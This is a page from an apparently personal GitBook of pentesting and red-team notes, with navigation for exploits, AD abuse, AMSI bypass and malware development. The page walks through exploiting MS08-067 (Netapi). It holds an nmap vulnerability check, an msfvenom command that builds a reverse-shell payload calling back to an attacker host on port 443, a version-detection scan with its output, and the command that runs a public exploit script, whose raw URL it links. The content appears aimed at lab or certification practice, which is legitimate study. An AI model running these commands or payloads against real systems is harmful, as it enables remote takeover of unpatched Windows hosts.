🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  1. Windows
  2. Exploits

MS08-67 - Netapi

Detecting it,

sudo nmap --script=smb-vuln-ms08-067 10.3.3.7

Generating reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

Detecting target version

nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.3.3.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-27 00:20 +03
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.11.1.227 (10.11.1.227)
Host is up (0.13s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery: 
|   OS: Windows 2000 (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_2000::-
|   Computer name: jd
|   NetBIOS computer name: JD\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-02-26T23:20:47+02:00

Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds

Exploiting it,

python2 ms08-067.py 10.3.3.7 2 139

please note that 2 is obtained from above

PreviousMS04-011 - LSASRVNextMS17-010 - Eternalblue

Last updated 3 years ago

https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py